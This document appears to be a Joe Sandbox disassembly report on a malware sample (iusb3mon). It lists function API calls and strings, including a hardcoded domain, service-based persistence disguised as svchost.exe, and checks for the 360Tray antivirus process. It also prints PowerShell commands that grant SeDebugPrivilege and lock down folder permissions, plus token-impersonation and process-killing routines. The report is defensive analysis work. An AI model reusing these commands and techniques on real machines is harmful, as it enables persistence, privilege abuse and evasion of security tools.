Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: aeb22738256223141b5ebfcb3524dc186b8279ea4a94b1af9a65a5319fe21170
Instruction ID: ec9d2870f77be2c9acbbb12c1cc571e088b4be484a6307f97ed88a15dd4a5790
Opcode Fuzzy Hash: aeb22738256223141b5ebfcb3524dc186b8279ea4a94b1af9a65a5319fe21170
Instruction Fuzzy Hash: 27E0E531200511A7DAF136615C0DB6A7E5DBF823B0F112021EC48B65D0CB20DC08D3E0

Function 04D7B4C3 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 04D7B4F8

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: 32ee63a905c832a81287e76841eb83ef149970f052080ee67cfe3523664cdcc8
Instruction ID: 50f974c17180d4ad049d67505f8850ec9a2f820a9db5d3877119de8dc446bb6a
Opcode Fuzzy Hash: 32ee63a905c832a81287e76841eb83ef149970f052080ee67cfe3523664cdcc8
Instruction Fuzzy Hash: 83E012327605156FFF227BA0DC159AE3765EF4175CF044015E900A6250FF54BD5156B2

Function 04D78CE2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 04D78CFC

Part of subcall function 04D78EF1: LoadLibraryA.KERNEL32(user32.dll,?,?,?,?,?,?,?,?,?,00000000,04D7ADE0,04D8E518,000000FF,?,04D78D0F), ref: 04D78F19
Part of subcall function 04D78EF1: GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 04D78F74
Part of subcall function 04D78EF1: GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 04D78F81
Part of subcall function 04D78EF1: GetProcAddress.KERNEL32(?,CloseDesktop), ref: 04D78F8D

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$EventLibraryLoad
String ID:
API String ID: 2618588663-0
Opcode ID: f268fa740de81f11c51d2bc274c299cc5b62613c8e3663b09edea36916e7ae9c
Instruction ID: 9ac384029958abe2c370ea95dfb8525b98733050d4345db25f5533302f8fc96d
Opcode Fuzzy Hash: f268fa740de81f11c51d2bc274c299cc5b62613c8e3663b09edea36916e7ae9c
Instruction Fuzzy Hash: EFE04671D0010DBAEB01BBA4EC0EBAEBF39EB00308F144490F10060092EBB26A60AB65

Function 04D7B4CE Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 04D7B4F8

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: 9e53f33f96f64f82a9a2ef04c0ce65d216402c85e1fc34377e821b2faa9cc5c8
Instruction ID: 8eacbd37ab0feabfdf34b082c5b41a0e1c96cf2c42042f507088c3c0ec299b93
Opcode Fuzzy Hash: 9e53f33f96f64f82a9a2ef04c0ce65d216402c85e1fc34377e821b2faa9cc5c8
Instruction Fuzzy Hash: 19D0A7313605116FF6323720DC14A3E2744EF0075CB044019E900D6180FF54FD4055B2

Function 04D71C74 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(00000000,00000080,04D7682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 04D71C88

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: caeb72d3a027353715b29d67a4d2a108ef99d71821fc231f922bcac8e2778197
Instruction ID: 3e437cb16a1872e39cf985744d7ed5b9cf3d19fa3c6eb07270275596698c3637
Opcode Fuzzy Hash: caeb72d3a027353715b29d67a4d2a108ef99d71821fc231f922bcac8e2778197
Instruction Fuzzy Hash: 08C09B3054835179FF554650C94DB5DBF516740744F048748B1C5541F0E6B554D4D701

Non-executed Functions

Function 04D7838B Relevance: 250.5, APIs: 71, Strings: 72, Instructions: 296libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,huazai168.com,00000000,75920F10,04D76B62), ref: 04D783A5
GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 04D783B6
GetProcAddress.KERNEL32(?,GetModuleFileNameA), ref: 04D783C3
GetProcAddress.KERNEL32(?,CreateMutexA), ref: 04D783D0
GetProcAddress.KERNEL32(?,ReleaseMutex), ref: 04D783DD
GetProcAddress.KERNEL32(?,GetLastError), ref: 04D783EA
GetProcAddress.KERNEL32(?,CloseHandle), ref: 04D783F7
GetProcAddress.KERNEL32(?,Sleep), ref: 04D78404
GetProcAddress.KERNEL32(?,lstrcatA), ref: 04D78411
GetProcAddress.KERNEL32(?,GetTickCount), ref: 04D7841E
GetProcAddress.KERNEL32(?,WaitForSingleObject), ref: 04D7842B
GetProcAddress.KERNEL32(?,GetFileAttributesA), ref: 04D78438
GetProcAddress.KERNEL32(?,CreateEventA), ref: 04D78445
GetProcAddress.KERNEL32(?,ResetEvent), ref: 04D78452
GetProcAddress.KERNEL32(?,CancelIo), ref: 04D7845F
GetProcAddress.KERNEL32(?,SetEvent), ref: 04D7846C
GetProcAddress.KERNEL32(?,TerminateThread), ref: 04D78479
GetProcAddress.KERNEL32(?,GetVersionExA), ref: 04D78486
GetProcAddress.KERNEL32(?,GetExitCodeProcess), ref: 04D78493
GetProcAddress.KERNEL32(?,ExpandEnvironmentStringsA), ref: 04D784A0
GetProcAddress.KERNEL32(?,GetSystemInfo), ref: 04D784AD
GetProcAddress.KERNEL32(?,GetSystemDirectoryA), ref: 04D784BA
GetProcAddress.KERNEL32(?,MoveFileA), ref: 04D784C7
GetProcAddress.KERNEL32(?,MoveFileExA), ref: 04D784D4

Strings

getsockname, xrefs: 04D78678
send, xrefs: 04D78618
lstrcatA, xrefs: 04D78406
MessageBoxA, xrefs: 04D78518
RegisterServiceCtrlHandlerA, xrefs: 04D786B0
ReleaseMutex, xrefs: 04D783D2
GetLastError, xrefs: 04D783DF
OpenServiceA, xrefs: 04D786D0
gethostname, xrefs: 04D78688
TerminateThread, xrefs: 04D7846E
SendMessageA, xrefs: 04D78538
GetCurrentProcess, xrefs: 04D784E3
MSVCRT.dll, xrefs: 04D78558
kernel32.dll, xrefs: 04D783A0
connect, xrefs: 04D78608
wsprintfA, xrefs: 04D784FD
SetServiceStatus, xrefs: 04D786A5
ExpandEnvironmentStringsA, xrefs: 04D78495
CloseServiceHandle, xrefs: 04D786F0
select, xrefs: 04D78668
GetVersionExA, xrefs: 04D7847B
recv, xrefs: 04D78628
Sleep, xrefs: 04D783F9
OpenSCManagerA, xrefs: 04D786C0
CloseHandle, xrefs: 04D783EC
CreateEventA, xrefs: 04D7843A
CreateProcessA, xrefs: 04D783AD
GetTickCount, xrefs: 04D78413
gethostbyname, xrefs: 04D785E8
wininet.dll, xrefs: 04D78790
memcpy, xrefs: 04D78580
WaitForSingleObject, xrefs: 04D78420
ControlService, xrefs: 04D78710
GetSystemDirectoryA, xrefs: 04D784AF
ExitWindowsEx, xrefs: 04D78508
DeleteService, xrefs: 04D78740
strlen, xrefs: 04D78570
ResetEvent, xrefs: 04D78447
ADVAPI32.dll, xrefs: 04D78698
EnumWindows, xrefs: 04D78548
WSAIoctl, xrefs: 04D78658
htons, xrefs: 04D785F8
User32.dll, xrefs: 04D784F0
WSACleanup, xrefs: 04D785C8
huazai168.com, xrefs: 04D7839F
closesocket, xrefs: 04D78638
MoveFileExA, xrefs: 04D784C9
memset, xrefs: 04D78590
strcmp, xrefs: 04D78565
SetEvent, xrefs: 04D78461
CreateProcessAsUserA, xrefs: 04D78780
CancelIo, xrefs: 04D78454
GetFileAttributesA, xrefs: 04D7842D
IsWindowVisible, xrefs: 04D78528
GetSystemInfo, xrefs: 04D784A2
MoveFileA, xrefs: 04D784BC
OpenProcessToken, xrefs: 04D78750
ws2_32.dll, xrefs: 04D785B0
GetExitCodeProcess, xrefs: 04D78488
WTSGetActiveConsoleSessionId, xrefs: 04D784D6
StartServiceA, xrefs: 04D786E0
CreateMutexA, xrefs: 04D783C5
DuplicateTokenEx, xrefs: 04D78760
WSAStartup, xrefs: 04D785BD
SetTokenInformation, xrefs: 04D78770
strstr, xrefs: 04D785A0
QueryServiceStatus, xrefs: 04D78706
CreateServiceA, xrefs: 04D78720
socket, xrefs: 04D785D8
GetModuleFileNameA, xrefs: 04D783B8
ChangeServiceConfig2A, xrefs: 04D78730
setsockopt, xrefs: 04D78648

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: ADVAPI32.dll$CancelIo$ChangeServiceConfig2A$CloseHandle$CloseServiceHandle$ControlService$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DeleteService$DuplicateTokenEx$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetCurrentProcess$GetExitCodeProcess$GetFileAttributesA$GetLastError$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersionExA$IsWindowVisible$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenProcessToken$OpenSCManagerA$OpenServiceA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SendMessageA$SetEvent$SetServiceStatus$SetTokenInformation$Sleep$StartServiceA$TerminateThread$User32.dll$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$closesocket$connect$gethostbyname$gethostname$getsockname$htons$huazai168.com$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$wininet.dll$ws2_32.dll$wsprintfA
API String ID: 2238633743-2422066229
Opcode ID: 58a00d4bddc2f876e75964ffbf1ab5f6cbbd123e384a4e9d0ea8f9b39f841eb2
Instruction ID: d6684a17c570fc998a533921b36625d647c90f2415fa79b12fc5e5d557672393
Opcode Fuzzy Hash: 58a00d4bddc2f876e75964ffbf1ab5f6cbbd123e384a4e9d0ea8f9b39f841eb2
Instruction Fuzzy Hash: ABB14270540B84AFEB71AF32CD05E6BBBE1EF80B01B01492DE4AA865A0D771BC59DF51

Function 04D76D6C Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 168serviceregistrystringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,huazai168.com,04D9CC34,00000000), ref: 04D76DA1
wsprintfA.USER32 ref: 04D76E5A
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 04D76E7F
CreateServiceA.ADVAPI32(00000000,?,04D9CA80,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 04D76EB8
LockServiceDatabase.ADVAPI32(00000000), ref: 04D76EC5
ChangeServiceConfig2A.ADVAPI32(?,00000001,04D9CA80), ref: 04D76EE9
ChangeServiceConfig2A.ADVAPI32(?,00000002,00015180), ref: 04D76F64
UnlockServiceDatabase.ADVAPI32(?), ref: 04D76F70
GetLastError.KERNEL32 ref: 04D76F7E
OpenServiceA.ADVAPI32(?,?,000F01FF), ref: 04D76F99
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 04D76FAC
StartServiceA.ADVAPI32(?,00000000,00000000), ref: 04D76FBA
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 04D76FFA
lstrlenA.KERNEL32(04D76D4E), ref: 04D77003
RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,04D76D4E,00000000), ref: 04D7701A

Strings

C:\Windows\svchost.exe, xrefs: 04D76E47, 04D76E4D
SYSTEM\CurrentControlSet\Services\, xrefs: 04D76FC4
Description, xrefs: 04D7700F
huazai168.com, xrefs: 04D76D91

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Service$Open$ChangeConfig2DatabaseStart$CreateErrorFileLastLockManagerModuleNameUnlockValuelstrlenwsprintf
String ID: C:\Windows\svchost.exe$Description$SYSTEM\CurrentControlSet\Services\$huazai168.com
API String ID: 432064258-3674977547
Opcode ID: 7306a60c1978a82967b4c2e512e5e496ac31f930eaf793aac039632ab71efd33
Instruction ID: 200cae37ea7f605d2525a0fdca29c3750079a49b9e85e7a687b33ccd4802447f
Opcode Fuzzy Hash: 7306a60c1978a82967b4c2e512e5e496ac31f930eaf793aac039632ab71efd33
Instruction Fuzzy Hash: 87712B719042A8EFEB229F64DC88BADBBB8FB09744F0444D9E10CA6251D7795F84CF61

Function 04D75792 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103libraryloaderprocessCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 04D757A6
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 04D757B7
GetCurrentProcess.KERNEL32 ref: 04D757FF
OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 04D7580F
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 04D75826
LoadLibraryA.KERNEL32(Kernel32.dll,WTSGetActiveConsoleSessionId), ref: 04D75836
GetProcAddress.KERNEL32(00000000), ref: 04D75839
SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 04D7584F
CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000430,?,00000000,00000044,?), ref: 04D7587B
CloseHandle.KERNEL32(?), ref: 04D7588D
CloseHandle.KERNEL32(?), ref: 04D75892
FreeLibrary.KERNEL32(?), ref: 04D758A0

Strings

WinSta0\Default, xrefs: 04D757F8
WTSGetActiveConsoleSessionId, xrefs: 04D7582C
Kernel32.dll, xrefs: 04D75831
CreateEnvironmentBlock, xrefs: 04D757AE
userenv.dll, xrefs: 04D757A1
D, xrefs: 04D757F1

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: LibraryProcessToken$AddressCloseHandleLoadProc$CreateCurrentDuplicateFreeInformationOpenUser
String ID: CreateEnvironmentBlock$D$Kernel32.dll$WTSGetActiveConsoleSessionId$WinSta0\Default$userenv.dll
API String ID: 1797627335-1926497751
Opcode ID: 2c827344c2cd36b0e582b6533f64a8236ff758a93c0398557480daa3ce1da66a
Instruction ID: 2128aa6fb1e7a177f60a35ad7a15ef837de1858277b656f54cd835265db0e5ef
Opcode Fuzzy Hash: 2c827344c2cd36b0e582b6533f64a8236ff758a93c0398557480daa3ce1da66a
Instruction Fuzzy Hash: 2131E3B2D11219BBDB11AFE5DC49EEEBFBDEF08710F10041AF205A2250D6B45A44DFA1

Function 04D7628E Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 46processsleepshutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 04D71F38: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,00000000,?,04DA8518,04D760C5,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 04D71F56

Part of subcall function 04D75CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 04D75CF6
Part of subcall function 04D75CE6: Process32First.KERNEL32(00000000,?), ref: 04D75D0F
Part of subcall function 04D75CE6: Process32Next.KERNEL32(00000000,00000128), ref: 04D75D2A
Part of subcall function 04D75CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 04D75D4F

WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 04D762D7
WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P,00000000), ref: 04D762DF
WinExec.KERNEL32(powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA,00000000), ref: 04D762E7
Sleep.KERNEL32(00001388), ref: 04D76301
ExitWindowsEx.USER32(00000000,00000000), ref: 04D76309

Strings

powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA, xrefs: 04D762E2
360tray.exe, xrefs: 04D762AA
Microsoft, xrefs: 04D7628F
C:\Windows\System32\SrpUxNativeSnapIn.dll, xrefs: 04D762EB
360Tray.exe, xrefs: 04D762BB
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P, xrefs: 04D762DA
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 04D762D2
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 04D76294

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Exec$Process32$CloseCreateExitFirstHandleNextOpenSleepSnapshotToolhelp32Windows
String ID: 360Tray.exe$360tray.exe$C:\Windows\System32\SrpUxNativeSnapIn.dll$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')$powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA
API String ID: 3961968786-728021376
Opcode ID: 7316a1bc5ae85c018a04193438bde4a2a317527c9c8e2c37935a4652dea348cf
Instruction ID: 2b9d172fec9dda06ccf465ca490c47e590dd41334189238d60caac249103a8a4
Opcode Fuzzy Hash: 7316a1bc5ae85c018a04193438bde4a2a317527c9c8e2c37935a4652dea348cf
Instruction Fuzzy Hash: A7F0B422760651B7AF6036B63C1AE6B2FD9EED6E75708011EF904E15C4F944B8488D72

Function 04D73C8E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 04D78FF7: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,04D739FA,SeShutdownPrivilege,00000001,?,04D7200F,?), ref: 04D7900F
Part of subcall function 04D78FF7: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 04D7901F
Part of subcall function 04D78FF7: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 04D7902A
Part of subcall function 04D78FF7: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 04D79035
Part of subcall function 04D78FF7: LoadLibraryA.KERNEL32(kernel32.dll,?,04D739FA,SeShutdownPrivilege,00000001,?,04D7200F,?), ref: 04D7903F
Part of subcall function 04D78FF7: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04D7904A
Part of subcall function 04D78FF7: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 04D79092
Part of subcall function 04D78FF7: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 04D7909A
Part of subcall function 04D78FF7: CloseHandle.KERNEL32(?), ref: 04D790A9
Part of subcall function 04D78FF7: FreeLibrary.KERNEL32(00000000), ref: 04D790BA
Part of subcall function 04D78FF7: FreeLibrary.KERNEL32(00000000), ref: 04D790C5

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04D73CAC
Process32First.KERNEL32(?,00000128), ref: 04D73CD5
OpenProcess.KERNEL32(00000001,00000000,?,?,00000128,00000002,00000000), ref: 04D73CFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 04D73D07
Process32Next.KERNEL32(?,00000128), ref: 04D73D17
CloseHandle.KERNEL32(?,?,00000128,?,00000128,00000002,00000000), ref: 04D73D23

Strings

SeDebugPrivilege, xrefs: 04D73C99, 04D73D2B
explorer.exe, xrefs: 04D73CE0

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
